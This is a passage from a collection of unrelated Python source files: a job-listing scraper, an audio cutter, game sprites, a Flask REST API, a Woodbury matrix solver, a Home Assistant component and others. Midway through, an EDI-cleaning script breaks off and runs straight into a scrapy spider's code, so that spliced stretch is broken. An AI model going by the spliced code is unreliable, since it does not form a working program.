(len(sys.argv) < 3): \n print(\"\\n\\tUsage: indeedminer.py \")\n print('\\te.g. $pythonw indeedminer.py \"HR Manager\" \"New York\"\\n')\n exit()\n\nsearch_page = int(args.pages)\nsearchpage=args.pages\nsearch_keyword= args.term\nlocation = args.l\nparams = {\n args.type:args.term,\n 'l':args.l\n }\n#as_ttl=\n#replace url_prefix with your favorite country from https://www.indeed.com/worldwide\nurl_prefix = \"https://www.indeed.com\" \nurl = url_prefix + \"/jobs?\"+urlencode(params)\n\ndef getJobLinksFromIndexPage(soup): \n jobcards = soup.find_all('div', {'class':'jobsearch-SerpJobCard row result'})\n \n job_links_arr = []\n \n #get job links\n for jobcard in tqdm(jobcards): \n job_title_obj = jobcard.find('a', {'class':'turnstileLink'})\n job_title_link = job_title_obj.get('href')\n job_links_arr.append(job_title_link)\n \n return job_links_arr\n\ndef getJobInfoLinks(url, next_page_count, url_prefix):\n job_links_arr = []\n \n while True: \n if (next_page_count < 1):\n break \n \n next_page_count -= 1\n \n html = urlopen(url)\n soup = BeautifulSoup(html, 'lxml')\n \n job_links_arr += getJobLinksFromIndexPage(soup)\n\n pagination = soup.find('div', {'class':'pagination'}) \n next_link = \"\"\n for page_link in reversed(pagination.find_all('a')):\n #reserve the pagination array to load the last element\n next_link_idx = page_link.get_text().find(\"Next\")\n if (next_link_idx >= 0):\n next_link = page_link.get('href') \n break \n \n if (next_link == \"\"):\n break\n \n url = url_prefix+next_link \n \n return job_links_arr \n\ncurrent_datetime = datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S')\nprint(\"Getting job links in {} page(s)...\".format(search_page))\njob_links_arr = getJobInfoLinks(url, search_page, url_prefix)\n\n#if no nltk, go download\ntry:\n nltk.data.find('tokenizers/punkt')\nexcept LookupError:\n nltk.download('punkt')\n\npunctuation = string.punctuation\njob_desc_arr=[] \nprint(\"Getting job details in {} post(s)...\".format(len(job_links_arr)))\nfor job_link in tqdm(job_links_arr): \n try:\n job_link = url_prefix+job_link\n #print(\"Handling->{}\".format(job_link))\n job_html = urlopen(job_link)\n job_soup = BeautifulSoup(job_html, 'lxml')\n job_desc = job_soup.find('div', {'class':'jobsearch-JobComponent-description'})\n job_meta = job_desc.find('div', {'class':'jobsearch-JobMetadataHeader-item'})\n #remove job meta\n if (job_meta is not None): \n job_meta.decompose()\n #add a space before each
  • to add spacing\n for li_tag in job_desc.findAll('li'):\n li_tag.insert(0, \" \") \n job_desc = li_tag.get_text() \n #job_desc = job_desc.get_text() \n #remove http \n job_desc = re.sub('https?:\\/\\/.*[\\r\\n]*', '', job_desc, flags=re.MULTILINE)\n job_desc = re.sub('data|description|working|years|year|time|1|2|3|4', '', job_desc, flags=re.MULTILINE)\n \n #replace punctutaion to space\n job_desc = job_desc.translate(job_desc.maketrans(punctuation, ' ' * len(punctuation))) \n job_desc_arr.append(job_desc)\n except:\n print(\"An exception occurred\")\n\n\nstop_words = stopwords.words('english') \nextra_stop_words = [\"experience\", \"position\", \"work\", \"please\", \"click\", \"must\", \"may\", \"required\", \"preferred\", \n \"type\", \"including\", \"strong\", \"ability\", \"needs\", \"apply\", \"skills\", \"requirements\", \"company\", \n \"knowledge\", \"job\", \"responsibilities\", \"big data\", \"systems\", \"teams\", \"design\", \"solutions\",\"business\",\n \"technological\",\"data\", \"technologies\", \"degree\",\"using\",\"big\", \"technical\", \"technology\", location.lower()] + location.lower().split()\nstop_words += extra_stop_words\n\nprint(\"Generating Word Cloud...\")\n#TFIDF\ntfidf_para = {\n \"stop_words\": stop_words,\n \"analyzer\": 'word', #analyzer in 'word' or 'character' \n \"token_pattern\": r'\\w{1,}', #match any word with 1 and unlimited length \n \"sublinear_tf\": False, #False for smaller data size #Apply sublinear tf scaling, to reduce the range of tf with 1 + log(tf)\n \"dtype\": int, #return data type \n \"norm\": 'l2', #apply l2 normalization\n \"smooth_idf\":False, #no need to one to document frequencies to avoid zero divisions\n \"ngram_range\" : (1, 2), #the min and max size of tokenized terms\n \"max_features\": 500 #the top 500 weighted features\n}\ntfidf_vect = TfidfVectorizer(**tfidf_para)\ntransformed_job_desc = tfidf_vect.fit_transform(job_desc_arr)\n\n#Generate word cloud\nfreqs_dict = dict([(word, transformed_job_desc.getcol(idx).sum()) for word, idx in tfidf_vect.vocabulary_.items()])\nw = WordCloud(width=800,height=600,mode='RGBA',background_color='white',max_words=500).fit_words(freqs_dict)\nplt.figure(figsize=(12,9))\nplt.title(\"Keywords:[{}] Location:[{}] {}\".format(search_keyword,location, current_datetime))\nplt.imshow(w)\nplt.axis(\"off\")\nplt.show()","sub_path":"indeedminer.py","file_name":"indeedminer.py","file_ext":"py","file_size_in_byte":5901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"166728565","text":"from pydub import AudioSegment\nimport numpy as np\nfrom datetime import datetime, timedelta \nimport os \nimport unpickle as up\nfrom dat_extract.extract.Ship_Variable_Extraction import Ship\nimport time\nfrom scipy import interpolate\n\nfilepath = \"J:\\ShippingCINMS_data\\COP\"\nrootdir = \"J:\\Pickled_Data\\\\\" #files with ship passages\ndestination_folder = \"J:\\CPA_WAV\\\\\"\n\n#class to hold all variables of mmsis\nclass mmsi:\n def __init__(self,mmsi,weight,length,hp):\n self.mmsi = mmsi\n self.weight = weight\n self.length = length\n self.hp = hp\n\ndef extract_mmsi(file):\n mmsis = []\n i=0\n with open(file, encoding=\"utf8\",errors = 'ignore') as fp: #extract specific lines\n for x, line in enumerate(fp):\n newMMSI = mmsi(0,0,0,0)\n mmsis.append(newMMSI)\n values = [x.strip() for x in line.split(',')]\n if values[4] != 'NA':\n mmsis[i].mmsi = int(values[4]) #first value is actual mmsi\n else:\n mmsis[i].mmsi = 0\n \n if values[3] != 'NA': \n mmsis[i].IMO 
= int(values[3])\n else:\n mmsis[i].IMO = 0\n \n # mmsis[i].weight = float(values[4]) #2 value is Dead weight\n if values[7] != 'NA':\n mmsis[i].length = float(values[7]) #3 value is length of ship\n else:\n mmsis[i].length = 0\n i+=1\n return mmsis\n #get the true length of the ship \ndef get_length(ship,mmsis):\n skip = True\n for mmsi in mmsis:\n if ship.mmsi == mmsi.mmsi and ship.IMO == mmsi.IMO:\n ship.length = mmsi.length\n skip = False\n return skip\n#finds nearest value in an array \ndef find_nearest(array, value):\n array = np.asarray(array)\n idx = (np.abs(array - value)).argmin()\n return array[idx]\n#converts time to a more usable format\ndef better_seconds(t):\n new_time = time.mktime(t.timetuple())\n return new_time\n#finds a value in an array and returns the index\ndef find_index(arr,value):\n result = np.where(arr == value)\n return result[0][0]\n\n#lines up the times from timestamps in the txt file with the time in the wav file \ndef convert_time(ship):\n \n start_time = find_nearest(ship.sampletimes,ship.file_time) #get the start index and cut array to fit it\n start_index = ship.sampletimes.index(start_time)\n times = ship.sampletimes[start_index:]\n cpa_index = ship.sampletimes.index(find_nearest(ship.sampletimes,ship.cpa_datetime))\n #not normal if cpa is is not in wav file\n if (start_time>=ship.cpa_datetime) or (len(times)<10):\n normal = False\n else:\n normal = True\n result_array = []\n for time in times:\n result_array.append(better_seconds(time) - better_seconds(times[0])) #subtract start time\n cpa_time = better_seconds(ship.cpa_datetime) - better_seconds(times[0]) #get new cpa_time in relation to wav file time\n \n return result_array, start_index, cpa_index,cpa_time,normal\n\n#creates new array of distances to match wav file ship passage\ndef new_distances(ship,start_index,con_times):\n\n distances = ship.distance[start_index:]\n inter = interpolate.interp1d(con_times,distances, axis=0, fill_value=\"extrapolate\")\n new_times = np.arange(0,con_times[len(con_times)-1],0.1)\n new_distances = inter(new_times)\n \n return new_distances,new_times\n \n#uses all these pieces to find the correct times to cut the file to exactly one ship crossing\ndef find_ship_passage(ship,distances,new_times,cpa_time,cpa_sog):\n\n cpa_time = find_nearest(new_times, cpa_time)\n cpa_index = find_index(new_times,cpa_time)\n cpa_distance = distances[cpa_index]\n \n ship_length_km = ship.length/1000\n tan30 = 0.57735026919\n sog_kmps = cpa_sog / 1943.844\n \n pre_time = (cpa_time - ((ship_length_km * tan30)/sog_kmps))\n post_time = (cpa_time + ((ship_length_km * tan30)/sog_kmps))\n \n pre_time = find_nearest(new_times,pre_time)\n post_time = find_nearest(new_times,post_time)\n \n\n pre_index = find_index(new_times,pre_time)\n post_index = find_index(new_times,post_time)\n \n \n pre_dis = distances[pre_index]\n post_dis = distances[post_index]\n \n if pre_time > post_time: #case where the ship is going towards hydrophone\n hold = pre_time\n pre_time = post_time\n post_time = hold\n # print(cpa_time)\n # print(cpa_distance)\n # print(pre_dis)\n # print(post_dis)\n # print(pre_time)\n # print(post_time)\n \n return pre_time,post_time\n\n#cuts wav file at specific times start and stop are in seconds \n#cutting happens in milliseconds\ndef cut_wav(start,stop,wav):\n \n start = start*1000\n stop = stop*1000\n \n wav_handle = AudioSegment.from_wav(wav)\n new_wav = wav_handle[start:stop]\n \n return new_wav\n\n#goes through ships only cutting normal ones and saves the new wav files\ndef 
main(rootdir,destination):\n i = 0\n mmsis = extract_mmsi('J:\\VZDATAALL.csv')\n for ships in up.unpickle_batch(rootdir, 100, 400, 500):\n for ship in ships:\n \n try:\n wavfilepath = ship.filepath + ship.id + '.wav' #the original wav file\n destination = destination_folder + ship.year_month +'\\\\' + ship.id + '.wav'\n \n \n \n skip = get_length(ship,mmsis)\n \n converted_times, start_index, cpa_index,cpa_time,normal = convert_time(ship)\n cpa_sog = ship.SOG[cpa_index]\n if (not normal):\n i+=1\n print('bad ' + str(i))\n elif skip:\n i+=1\n print('mmsi not included ' + str(i))\n else:\n distances, new_times = new_distances(ship, start_index, converted_times)\n pre, post = find_ship_passage(ship,distances,new_times,cpa_time,cpa_sog)\n \n pass_wav = cut_wav(pre,post,wavfilepath)\n \n print(wavfilepath)\n pass_wav.export(destination,format=\"wav\")\n \n \n \n except:\n up.one_jar(rootdir,ship,True)\n print('something went wrong')\n pass\n \nmain(rootdir,destination_folder)","sub_path":"scripts/Passage_WAV_Cutter.py","file_name":"Passage_WAV_Cutter.py","file_ext":"py","file_size_in_byte":6488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"389228854","text":"import pygame\nimport src.MainImages as main_img\n\n\nclass CeilingClass(pygame.sprite.Sprite):\n def __init__(self, width, height, rect_x, rect_y):\n \"\"\"\n :params: coordinates describing the position of this ceiling\n :type: int\n \"\"\"\n self.width = width\n self.height = height\n self.image = pygame.Surface([self.width, self.height])\n self.image = self.image.convert()\n self.image.fill((250, 250, 250))\n self.rect = self.image.get_rect()\n self.rect.x = self.start_position_x = rect_x\n self.rect.y = self.start_position_y = rect_y\n\n def draw(self, surface):\n blocks_counter = int(self.width / main_img.BLOCKS_WIDTH)\n if blocks_counter == 1:\n surface.blit(main_img.single_platform, self.rect)\n else:\n for i in range(blocks_counter):\n if i == 0:\n surface.blit(main_img.ceiling_left, (self.rect[0] + i * main_img.BLOCKS_WIDTH, self.rect[1]))\n elif i == blocks_counter - 1:\n surface.blit(main_img.ceiling_right, (self.rect[0] + i * main_img.BLOCKS_WIDTH, self.rect[1]))\n else:\n surface.blit(main_img.ceiling_center, (self.rect[0] + i * main_img.BLOCKS_WIDTH, self.rect[1]))\n\n def move_ceiling_x(self, speed):\n self.rect[0] += speed\n","sub_path":"src/PlatformsMainPackage/CeilingClass.py","file_name":"CeilingClass.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"64961382","text":"from flask import Flask, url_for, jsonify, request, render_template, redirect\nfrom flask.ext.sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://daniel@localhost/mydb'\ndb = SQLAlchemy(app)\n\n\nclass ValidationError(ValueError):\n pass\n\n\nclass BMWReddit(db.Model):\n __tablename__ = 'bmwreddit'\n id = db.Column(db.Integer, primary_key=True)\n date = db.Column(db.String(50))\n score = db.Column(db.Integer)\n domain = db.Column(db.String(100))\n title = db.Column(db.String(250))\n author = db.Column(db.String(50))\n upVote = db.Column(db.Integer)\n downVote = db.Column(db.Integer)\n comments = db.Column(db.Integer)\n\n def get_url(self):\n return url_for('get_student', user_id=self.id, _external=True)\n\n def export_data(self):\n return {\n 'self_url': self.get_url(),\n 'date': self.date,\n 'score': 
self.score,\n 'domain': self.domain,\n 'title': self.title,\n 'author': self.author,\n 'upVote': self.upVote,\n 'downVote': self.downVote,\n 'comments': self.comments\n }\n\n def import_data(self, data):\n try:\n self.date = data['date']\n self.score = data['score']\n self.domain = data['domain']\n self.title = data['title']\n self.author = data['author']\n self.upVote = data['upVote']\n self.downVote = data['downVote']\n self.comments = data['comments']\n except KeyError as e:\n raise ValidationError('Invalid student: missing ' + e.args[0])\n return self\n\n\n@app.route('/', methods=['GET'])\ndef index():\n return redirect(\"/bmw/\", code=302)\n\n\n@app.route('/bmw/', methods=['GET'])\ndef get_students_api():\n bmw = BMWReddit.query.all()\n return render_template('index.html', bmw=bmw)\n\n\n@app.route('/bmw/modifications/', methods=['GET'])\ndef get_student():\n return render_template('singlepage.html')\n\n\n@app.route('/bmw/insert/', methods=['GET'])\ndef insert_record():\n return render_template('insert.html')\n\n\n@app.route('/bmw/mostcomments/', methods=['GET'])\ndef most_comments():\n bmw = []\n results = BMWReddit.query.order_by(BMWReddit.comments.desc()).limit(10)\n for rbmw in results:\n bmw.append(rbmw.export_data())\n return render_template('mostcomments.html', bmw=bmw)\n\n\n@app.route('/bmw/highestscore/', methods=['GET'])\ndef highest_score():\n bmw = []\n results = BMWReddit.query.order_by(BMWReddit.score.desc()).limit(10)\n for rbmw in results:\n bmw.append(rbmw.export_data())\n return render_template('highestscore.html', bmw=bmw)\n\n\n@app.route('/bmw/lowestscore/', methods=['GET'])\ndef lowest_score():\n bmw = []\n results = BMWReddit.query.order_by(BMWReddit.score.asc()).limit(10)\n for rbmw in results:\n bmw.append(rbmw.export_data())\n return render_template('lowestscore.html', bmw=bmw)\n\n\n##### API\n\n@app.route('/bmw/api/documentation/', methods=['GET'])\ndef get_api():\n return render_template('api.html')\n\n\n@app.route('/bmw/api/', methods=['GET'])\ndef get_students():\n return jsonify({'posts': [post.get_url() for post in BMWReddit.query.all()]})\n\n\n@app.route('/bmw/api/', methods=['GET'])\ndef get_student_api(user_id):\n return jsonify(BMWReddit.query.get_or_404(user_id).export_data())\n\n\n@app.route('/bmw/api/', methods=['POST'])\ndef new_record():\n post = BMWReddit()\n post.import_data(request.json)\n db.session.add(post)\n db.session.commit()\n return jsonify({\"status\": \"record added\"}), 201\n\n\n@app.route('/bmw/api/', methods=['PUT'])\ndef edit_record(user_id):\n post = BMWReddit.query.get_or_404(user_id)\n post.import_data(request.json)\n db.session.add(post)\n db.session.commit()\n return jsonify({\"status\": \"record updated\"})\n\n\n@app.route('/bmw/api/', methods=['DELETE'])\ndef delete_record(user_id):\n record = BMWReddit.query.get_or_404(user_id)\n # print(record)\n db.session.delete(record)\n db.session.commit()\n return jsonify({\"status\": \"record deleted\"})\n\n\n@app.errorhandler(404)\ndef not_found(e):\n return render_template('404.html')\n\n\nif __name__ == '__main__':\n db.create_all()\n app.run(debug=True)","sub_path":"bmw/app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"610206885","text":"#!/usr/bin/env python3\n\nimport torch\nfrom .. 
import settings\n\n\ndef woodbury_factor(umat, vmat, diag, logdet=False):\n r\"\"\"\n Given a matrix factorized as :math:`(D + U V^T)`, where\n :math:`U`, :math:`V` are (n x k) and :math:`D` is a (n x n) diagonal matrix,\n returns the matrix :math:`R` so that\n\n .. math::\n \\begin{equation*}\n R = (I_k + V^T D^-1 U)^{-1} V^T\n \\end{equation*}\n\n to be used in solves with (D + U V^T) via the Woodbury formula.\n Can also be used in batch mode, where U, V, and D are batches of matrices\n\n If the :attr:`logdet=True` flag is set, this function will also return the\n log determinant of :math:`(D + U V^T)`.\n\n Args:\n :attr:`umat` (Tensor n x k):\n The left matrix factor\n :attr:`vmat` (Tensor n x k):\n The right matrix factor\n :attr:`diag` (Tensor n):\n The diagonal of D\n :attr:`logdet` (bool):\n Whether or not to return the log determinant\n\n Returns:\n Tensor (k x n) (if `logdet=False`)\n Tensor (k x n), Tensor () (if `logdet=True`)\n \"\"\"\n if settings.debug.on():\n if umat.shape != vmat.shape:\n raise ValueError(\"umat ({}) and vmat ({}) must have the same shape.\".format(umat.shape, vmat.shape))\n if umat.shape[:-1] != diag.shape:\n raise ValueError(\"Incompatible shape for diag ({}) given umat shape ({}).\".format(diag.shape, umat.shape))\n\n # Sizes\n *batch_shape, n, k = umat.shape\n\n # These reshapes make it easier to use faster blas calls\n umat = umat.view(-1, n, k)\n vmat = vmat.view(-1, n, k)\n diag = diag.view(-1, n, 1)\n\n # Scale the diagonal\n # s = scale = max |1 / diag|\n inv_scale = diag.abs().min()\n scaled_inv_diag = inv_scale / diag\n\n # Compute (1/s (I_k + V^T D^-1 U)), where s is a scale factor\n inner_mat = torch.baddbmm(\n inv_scale,\n torch.eye(k, dtype=scaled_inv_diag.dtype, device=scaled_inv_diag.device),\n 1,\n vmat.transpose(-1, -2),\n umat * scaled_inv_diag\n )\n\n # Compute the cholesky factor of (1/s (I_k + V^T D^-1 U))\n chol = torch.cholesky(inner_mat)\n\n # Compute s (I_k + V^T D^-1 U)^-1 V^T\n R = torch.cholesky_solve(vmat.transpose(-1, -2), chol).view(*batch_shape, k, n)\n\n # Maybe compute the log determinant\n if logdet:\n # Using the matrix determinant lemma here\n logdet = chol.diagonal(dim1=-1, dim2=-2).log().sum(-1).mul(2) - scaled_inv_diag.log().sum([-1, -2])\n # Undo the effect of scaling on D^{-1}\n logdet = logdet + inv_scale.log().mul(n - k)\n # Reshape\n logdet = logdet.view(*batch_shape) if len(batch_shape) else logdet.squeeze()\n return R, inv_scale, logdet\n else:\n return R, inv_scale\n\n\ndef woodbury_solve(rhs, scaled_inv_diag_umat, woodbury_factor, scaled_inv_diag, inv_scale):\n \"\"\"\n Solves the system of equations: :math:`(D + U V^T)x = b` using the Woodbury formula,\n where x is the right-hand-side (size n), U, V are (n x k), and D is a (n x n) diagonal matrix.\n Can also be used in batch mode, where U, V, and D are batches of matrices and rhs is a batch of right-hand-side.\n\n This should be used after calling woodbury_factor.\n\n Args:\n :attr:`rhs` (size n x t)\n Right hand side vector b to solve with.\n :attr:`scaled_inv_diag_umat` (n x k)\n The `D^{-1} U` matrix\n :attr:`woodbury_factor` (n x k)\n The result of calling woodbury_factor on U, V, and D.\n :attr:`diag` (vector)\n The diagonal of D\n \"\"\"\n # (D + UV^T)x = D^-1 x - D^-1 U ((I + V^T D^-1 U)^-1 V^T) D^-1 x\n # = D^-1 x - D^-1 U (1/s (woodbury_factor)) D^-1 x\n # = s( E^-1 x - E^-1 U (woodbury_factor) E^-1 x )\n scaled_inv_diag_rhs = rhs * scaled_inv_diag\n res = torch.add(scaled_inv_diag_rhs, -1, scaled_inv_diag_umat @ (woodbury_factor @ 
scaled_inv_diag_rhs))\n res = res.div_(inv_scale)\n\n # Reshape the result to be the correct shape\n return res\n","sub_path":"gpytorch/utils/woodbury.py","file_name":"woodbury.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"410525126","text":"\"\"\"https://leetcode.com/problems/combination-sum-ii/\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:\n candidates.sort()\n ret = []\n self.find(candidates, 0, target, [], ret)\n return ret\n\n def find(self, nums, index, target, result, ret):\n if target < 0:\n return\n elif target == 0:\n if result not in ret:\n ret.append(result)\n else:\n for i in range(index, len(nums)):\n if nums[i] > target:\n break\n else:\n self.find(nums, i + 1, target - nums[i], result + [nums[i]], ret)\n","sub_path":"leetcode/1-100/40-Combination Sum II/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"240871790","text":"import re\nimport os\n\nfileLocation = input('Drop file here:\\n')\n\n# os.chdir(\"G:\\Enrollment Management Center\\Evaluation Requests\\EDIs\")\nos.chdir(\"C:/Users/jonng/Documents\")\n\n\nclass CleanLine:\n '''This class cleans the extra blank spaces and changes the line according\n to the data inside'''\n\n def __init__(self, line):\n '''Removes all the extra blank spaces from everyline of the EDI'''\n self.line = re.sub(r'(\\s+)', ' ', line.strip())\n\n def course(self):\n '''This function removes all of the unnecessary information from the\n lines containing coursework'''\n self.line = re.sub(r'(\\W)$', '', self.line)\n self.line = re.sub(r'((\\s)(\\d))$', '', self.line)\n self.line = re.sub(r'((\\s)([E|I]))$', '', self.line)\n self.line = re.sub(r'((I/F))$', 'F', self.line)\n self.line = re.sub(r'((WF|WQ|FX))$', 'F', self.line)\n self.line = re.sub(r'((WL))$', 'W', self.line)\n self.line = re.sub(r'^(WBCT).+', '', self.line)\n return self.line\n\n def names(self):\n '''Makes the line containing names prettier'''\n self.line = re.sub(r'AS: ', '', self.line)\n return self.line\n\n def terms(self):\n '''Changes the term line to a simple *TERM* *YEAR* '''\n if bool(re.search(r'(Mini:)', self.line, re.IGNORECASE)) is True:\n self.line = re.sub(r'\\s*(<<).+', 'MINIMESTER', self.line)\n return self.line\n\n elif bool(re.search(r'(Correspondence)',\n self.line, re.IGNORECASE)) is True:\n self.line = re.sub(r'\\s*(<<).+', 'CORRESPONDENCE', self.line)\n return self.line\n\n elif bool(re.search(r'(Quarter)',\n self.line, re.IGNORECASE)) is True:\n self.line = re.sub(r'\\s*(<<).+', 'Quarter', self.line)\n return self.line\n\n elif bool(re.search(r'(Orientation)', self.line,\n re.IGNORECASE)) is True:\n self.line = re.sub(r'\\s*(<<).+', 'ORIENTATION', self.line)\n return self.line\n\n elif bool(re.search(r'^\\s*(<<:|< 0:\r\n\t\t\tself.noti = Notifier(Id=self._spec_id, item=self.noti_cont)\r\n\t\t\tself.noti.callthespiders()\r\n\t\t\tself.noti_cont = []\r\n\r\n\tdef failed(self, failure):\r\n\t\tself.logger.error(repr(failure))\r\n\t\turl=[]\r\n\t\turl.append(failure.value.response.url)\r\n\t\tpg=self.folder+\"/bad_pages.json\"\r\n\t\tself.red.search_file(pg, url)\r\n \r\nif __name__ == '__main__':\r\n\r\n\tfrom scrapy.crawler import CrawlerProcess\r\n\t# POSTING a valid USER-AGENT\r\n\tprocess = CrawlerProcess({\r\n\t\t\t\t'USER_AGENT': 
\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\\\r\n\t\t\t\t\"Chrome/42.0.2311.135 Safari/537.36 Edge/12.246\",\r\n\t\t\t\t'HTTPPROXY_ENABLED': 'True',\r\n\t\t\t\t'CONCURRENT_REQUESTS': 1,\r\n\t\t\t\t'DNS_TIMEOUT': 10,\r\n\t\t\t\t'DOWNLOAD_TIMEOUT' : 120\r\n\t\t\t})\r\n\r\n\tprocess.crawl(Models1())\r\n\tprocess.start()\r\n","sub_path":"spiders/Russian/sc_rus.py","file_name":"sc_rus.py","file_ext":"py","file_size_in_byte":9688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"368966821","text":"from pico2d import *\nimport gfw\n\nGRAVITY = 0.5\n\nclass Player2:\n\n def __init__(self):\n\n self.x, self.y = get_canvas_width() // 2 + 200, get_canvas_height() // 2 - 197\n self.pos = self.x, self.y\n self.dx = 0\n self.dy = 0\n self.speed = 200\n self.image_walk = gfw.image.load('res/pikachu2_sprite.png')\n self.image = gfw.image.load('res/pikachu2.png')\n self.image_jump = gfw.image.load('res/pikachu_jump2.png')\n self.jump = False\n self.jump_power = 0\n self.jump_direction = 0\n self.jump_sound = load_wav('res/pikachu_jump.wav')\n self.jump_sound.set_volume(10)\n self.radius = 32\n self.move_distance = (self.dx) ** 2 + (self.dy) ** 2\n\n self.time = 0\n self.fidx = 0\n self.keycount = 0\n\n def reset(self):\n self.x, self.y = get_canvas_width() // 2 + 200, get_canvas_height() // 2 - 200\n self.pos = self.x, self.y\n self.dy = 0\n self.dx = 0\n self.jump = False\n self.jump_power = 0\n self.jump_direction = 0\n self.move_distance = (self.dx) ** 2 + (self.dy) ** 2\n self.time = 0\n self.fidx = 0\n self.keycount = 0\n\n def jump_check(self):\n if self.jump == True:\n if self.jump_direction == 1:\n if self.jump_power <= 0:\n self.jump_direction = 2\n self.dy = self.jump_power\n self.jump_power -= GRAVITY\n\n elif self.jump_direction == 2:\n if self.y <= get_canvas_height() // 2 - 200:\n self.jump_direction = 0\n self.jump_power = 0\n self.dy = 0\n self.y = get_canvas_height() // 2 - 200\n self.jump = False\n\n self.dy = self.jump_power\n self.jump_power -= GRAVITY\n\n\n def move_check(self):\n self.move_distance = (self.dx) ** 2 + (self.dy) ** 2\n\n\n def update(self):\n self.move_check()\n self.jump_check()\n self.x += self.dx * gfw.delta_time * self.speed\n if self.x < self.radius:\n self.x = self.radius\n self.y += self.dy * gfw.delta_time * (self.speed // 2)\n if self.x > get_canvas_width() - self.radius:\n self.x = get_canvas_width() - self.radius\n self.pos = self.x, self.y\n\n if self.dx == 1:\n self.time += gfw.delta_time\n elif self.dx == -1:\n self.time -= gfw.delta_time\n frame = self.time * 7\n self.fidx = int(frame) % 7\n\n\n\n\n def draw(self):\n sx = self.fidx * 65\n if self.jump == False and self.dx == 0:\n self.image.draw(*self.pos)\n elif self.jump == False and self.dx != 0:\n self.image_walk.clip_draw(sx, 0, 65, 58, *self.pos)\n elif self.jump == True:\n self.image_jump.clip_draw(sx, 0, 65, 58, *self.pos)\n\n def handle_event(self, e):\n\n if e.type == SDL_KEYDOWN:\n if e.key == SDLK_LEFT:\n if self.dx >= 0:\n self.dx -= 1\n self.keycount += 1\n elif e.key == SDLK_RIGHT:\n if self.dx <= 0:\n self.dx += 1\n self.keycount += 1\n elif e.key == SDLK_UP:\n if self.jump == False:\n self.jump_sound.play()\n self.jump = True\n self.jump_power = 10\n self.jump_direction = 1\n self.time = 0\n self.fidx = 0\n elif e.key == SDLK_DOWN:\n pass\n\n elif e.type == SDL_KEYUP:\n if self.keycount > 0:\n if e.key == SDLK_LEFT:\n if self.dx <= 0:\n self.dx += 1\n self.keycount -= 1\n elif e.key == 
SDLK_RIGHT:\n                    if self.dx >= 0:\n                        self.dx -= 1\n                        self.keycount -= 1\n                elif e.key == SDLK_UP:\n                    pass\n                elif e.key == SDLK_DOWN:\n                    pass\n\n","sub_path":"기말프로젝트/player2.py","file_name":"player2.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"397402415","text":"#def setup(hass, config):\n    # hass.states.set(\"hachina.hello_world\", \"Awesome!\")\n    #return True\nimport logging\n#from mcpi.minecraft import Minecraft\n#mc=Minecraft.create(\"47.100.46.95\",4783)\n#entityId= mc.getPlayerEntityId(\"HJN\")\nDOMAIN = \"hachina1\"\nENTITYID = DOMAIN + \".hello_world\"\n \n# In Python, __name__ holds the name of the current module\n_LOGGER = logging.getLogger(__name__)\n \n \ndef setup(hass, config):\n    \"\"\"Called by the system after the configuration file is loaded.\"\"\"\n    attr = {\"icon\": \"mdi:face\",\n            \"friendly_name\": \"robot\",\n            \"slogon\": \"cleaning robot\", }\n    hass.states.set(ENTITYID, 'off', attributes=attr)\n \n    def change_state(call):\n        \"\"\"Toggle the state of the entity.\"\"\"\n        # Log a message at the info level\n        _LOGGER.info(\"hachina's change_state service is called.\")\n \n        # Toggle the state value\n        if hass.states.get(ENTITYID).state == 'off':\n            hass.states.set(ENTITYID, 'on', attributes=attr)\n            with open(\"C:/Users/Administrator.PC-20170611QCUM/Desktop/test/111.txt\",\"w\") as f: \n                f.write('True')\n            #mc.setBlocks(46,-3,87,116,-3,139,152)\n            #mc.setBlock(46,-3,87,0)\n            #mc.setBlock(46,-3,139,0)\n            #mc.setBlock(116,-3,87,0)\n            # mc.setBlock(116,-3,139,0)\n        else:\n            hass.states.set(ENTITYID, 'off', attributes=attr)\n            with open(\"C:/Users/Administrator.PC-20170611QCUM/Desktop/test/111.txt\",\"w\") as f:\n                f.write('False')\n            #mc.setBlocks(46,-3,87,116,-3,139,155)\n \n    # Register the service hachina1.change_state\n    hass.services.register(DOMAIN, 'change_state', change_state)\n \n    return True\n","sub_path":"team/team3/无人超市/ha/custom_components/hachina1.py","file_name":"hachina1.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"497616436","text":"from PIL import ImageGrab\r\nfrom tkinter import *\r\nfrom tkinter.filedialog import asksaveasfile\r\nimport time\r\n\r\nTk().withdraw()\r\nfiles = [(\"Image\", \"*.png\")]\r\npath = asksaveasfile(mode=\"w\", filetypes=files, defaultextension=files, initialfile=\"image.png\")\r\ntry:\r\n    path = path.name\r\nexcept:\r\n    print(\"Can't Download\")\r\n    time.sleep(1)\r\nelse:\r\n    img = ImageGrab.grabclipboard()\r\n    try:\r\n        img.save(path, \"PNG\")\r\n    except:\r\n        print(\"Can't Download\")\r\n    else:\r\n        print(\"Saved:\",path)\r\n        time.sleep(1)\r\n","sub_path":"downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"345037036","text":"import pandas as pd\r\n\r\n###### Import Data\r\ndf_2020 = 